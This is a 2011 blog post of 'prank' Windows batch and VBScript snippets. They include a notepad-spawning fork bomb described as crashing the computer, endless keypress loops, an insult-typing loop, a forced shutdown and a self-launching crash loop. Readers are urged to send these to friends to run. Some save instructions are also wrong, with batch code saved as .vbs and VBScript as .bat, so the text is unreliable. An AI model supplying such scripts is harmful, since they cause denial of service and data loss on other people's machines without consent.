Friday 14 October 2011

Notepad Batch Programming Cool Tricks

Notepad:

Notepad is a simple text editor for Microsoft Windows included since 1985 from MIcrosoft Windows 1.0 .It is like notebook page for windows users.It's supports many programming languages like c, c++, java, batch programming an many more.

Batch file:

In Windows, Batch file is a file containing scequence of command for a computer operating system in a code/programming known as batch programming.It's is most common language for creating viruses because in batch programming it's easy to create a virus and run it on any computer that has windows and DOS.The best commonly known DOS batch file is the AUTOEXEC.BAT file that initializes DOS when you start the system.

Today I am going to share few Notepad batch programming tricks. They are really cool and crazy one's. So Please think atleast three to four times to use them on your PC or your friends PC.

UNLIMITED NOTEPAD WINDOWS HACK :

This will pop up endless notepads until the computer freezes and crashes. Copy the below

code in notepad and save it as ".vbs" extension.

Code:-

@ECHO off

:top

START %SystemRoot%\system32\notepad.exe

GOTO top

CAPS LOCK CRAZY TRICK :

This constantly turns caps lock on and off really fast continuously.

Code:-

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

loop

UNLIMITED BACKSPACE HACK :

This makes it so the backspace key is constantly being pressed.

Code:-

MsgBox "Let's go back a few steps"

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{bs}"

loop

Hack your friend's keyboard and make him type "You are a fool" :

simultaneously:

Code:

Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "You are a fool."

loop

Save it as "anything.bat" and send to your friend, if he runs it

Your Friend Keyboard automatically writes "you are a fool"

Convey your friend a message and shut down his / her computer:
Code:

@echo off

msg * I don't like you

shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.bat

Crash Your Friend Computer (If you both are so close buddies) :

To do this first open notepad and copy the code below.
:loop
start joke.bat
Goto loop

Save it as "Anything.BAT" in All Files and run that file for effect.

Thanks For Reading !!! :D

Hope You Like It . . .


0

No comments:

Post a Comment